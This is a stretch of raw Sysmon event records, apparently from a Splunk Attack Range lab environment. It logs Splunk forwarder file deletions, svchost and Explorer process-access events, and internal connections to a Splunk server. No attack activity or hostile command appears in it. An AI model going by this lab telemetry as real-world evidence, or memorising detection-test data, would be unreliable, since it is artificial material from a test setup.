Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0BC2F919B84F7A2329745A00996693D,SHA256=15D0F9E1AABFEA40F34C953B5008C687DE3B3A4F140C9AE44F2460FA942999B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293783Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:32.535{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80C24E6419E096570BA7BF38F246712F,SHA256=02F89E04D941282A6116E25D09B641FA32172A68D9AA2D52C127AE513FC57AB4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218162Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:32.722{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218161Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:32.722{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218160Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:32.722{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000218159Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:29.624{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51443-false10.0.1.12-8000- 10341000x8000000000000000293782Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:32.171{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293781Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:32.171{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293780Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:32.171{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000218164Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:33.847{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7DDA3B8CE8B024426E8533069467CC7,SHA256=86CE40C5F5E61E4CB883D3DCD64F9783FBAD8C96BE98D99B0E284C5DF34BBCA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293785Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:33.540{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C977094B6528F190C168C5BB2095B0BC,SHA256=8AAF2DF5658A39EFA8A6897CD03A1B51FE6207BFBB6908727ADDE54B45BBB60E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293784Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:33.418{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=17406D44AC5BC6BCC9D7F583A90F9CBA,SHA256=D99B48A7D091E3C97137FCDB8842057AEF11749CF83E210AEEAE0D44388C3451,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218165Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:34.863{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4142411682F6DA43ED6F5BEB0AF8FDA9,SHA256=98D56BC1E4505A86AE66F35F4B234A46880B3CB4DFDDE4C4C56EE176FD720D53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293786Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:34.555{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05B9576B1036575DD14D9E9E2FE7B855,SHA256=1C6AF2F2EF677602630F7D5AA6195CEE91AE53CE9A72EAB9DED9F6E7927DF725,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218166Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:35.878{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D85D4CE60E195449D6A5F6C5B673A124,SHA256=75BF4BA5A38C46082FBF4E9E0A996A668BA86900D4E81705985E2A9C71103F3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293787Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:35.586{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A5F19D31DF616D2E97EA2B515974820,SHA256=E38A38447C751946784B0C29EAAD251A5E49E9FF8DBB2E3A65C8E97EF9796645,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218167Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:36.894{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45AB0F142A037F26C5C2F2E1B4D14E18,SHA256=F568CE45325AE0C623AA3A84E136F08C156E76FAA969EAEC239A256A9B07F159,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293789Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:34.606{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53832-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000293788Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:36.599{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AC9640191DF43F992DED63B3D7A1AF1,SHA256=CC27945A99AA112B09C5128456AF4BE9A60D131D46EE7BC639D8806EC6A6CBA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218169Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:37.925{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C63C0AF2FB612B3D4E1ABA4DEB12D20,SHA256=B9618B00560678B39E3C49DA651F39B73BB4341617B2413D9DE6260099053C6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293790Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:37.614{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5358E9BCD6ABA0CFCA7B1F038BD758AD,SHA256=2638E8D65C6F565ECA22AEB98E32E5D7AB5619026A94A42D62BF5B5BC75F194F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218168Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:34.686{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51444-false10.0.1.12-8000- 23542300x8000000000000000218170Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:38.941{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46ACFCB22580927B507CD8F6B075A473,SHA256=A40DC8F343864EC08C2C11CA820E71F4874A77DA829357FDB12390256BC35416,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293791Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:38.650{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90D29EBA86A70EBEF2FAAF3F4F5CAE6B,SHA256=BAD68475F27ED1AA1BD6382604C6113E217AFC6009BAA2675495DA9F828A348C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218171Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:39.956{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF4260C006E1FC25E8379E0089F3F840,SHA256=704D651964DCE0FD85D509315FA58528244FAF773B66FC49471670B33CFB700A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293792Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:39.671{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7416336AE7CCE5692C627FC90D217E0B,SHA256=EE71AE89946C4A110E25D71F03FA08269C2DC344446F90DDAF5E0B6BDA615B92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218172Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:40.972{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD585FB51C4D2BFB93C7B73A0FA73573,SHA256=6B94126B578E9CDF94C5F4E97C4E109AA705DF1225DE9E8360CB75168F925CA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293797Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:40.701{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC46204E9A997806955026AEDE5DE456,SHA256=2A32ACE61D39191AEB8139155FD3EF0B3A674BC1204E715387469F71A12A5910,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293796Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:40.633{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293795Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:40.633{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293794Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:40.633{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293793Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:40.071{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218173Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:41.987{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A109AE5FC4FD3A9AD6328AA511C3FF04,SHA256=ABF3ACE876D5B827F9169909AF0F40A94F08DD9D950D2304F0D15654A61C29C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293800Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:41.702{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68033368C563CCE76751A5E79EAEB5E4,SHA256=DC8A7C6C0F3E53501AADD856DB42256588F24DC73AC0F3A758539E7EBC9A78F2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293799Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:39.691{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53834-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000293798Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:39.522{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53833-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000293803Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:42.733{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=655912782E03239F370B7AF4672D6A1A,SHA256=2CAB31C33C9E4229373A23C5B4B072C00DC536EFD5D433C32006A9AA045486CD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218174Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:40.592{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51445-false10.0.1.12-8000- 23542300x8000000000000000293802Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:42.252{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=9656C8930E102DF42911C1F1BA31E409,SHA256=C8E971A6829B27B66AB941580999ED395F93BA726D752740C3F0AEBA157431FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293801Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:42.234{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=5B5ECB73BAAC062F8C07B56F33AB616A,SHA256=1901A0038A5E2BD00CAC67B861188B3DE0F604775F3E4B65F782721301AC2AA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293806Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:43.755{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=673CA18042D6909C7E425BA87E1B5066,SHA256=B25A0CD3E6F31CA787E440CF650B2C6100C8140779B62FD61713806A313ACDA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218175Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:43.019{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D1ECCE4D79EB067ABBC2EAD4CF62F42,SHA256=D4C37B3FF86CAA2793EE93FC30DABEC5C8959DFAF50A52D1F0D8810B883CE38C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293805Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:43.202{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=8D25E11CE5AA75DF775BA68BDC81B7FB,SHA256=FA09AB013CDBEC54A90761F1AB4AC886CB8E004A86827169FD8EA0B4CDE26A34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293804Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:43.202{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=65225BA27C1657D9CDFC332CB0615D33,SHA256=1ED053BD33D82138E3C27A05712ED8B84A1C38EE3911216C7BB5C054B9031450,IMPHASH=00000000000000000000000000000000falsetrue 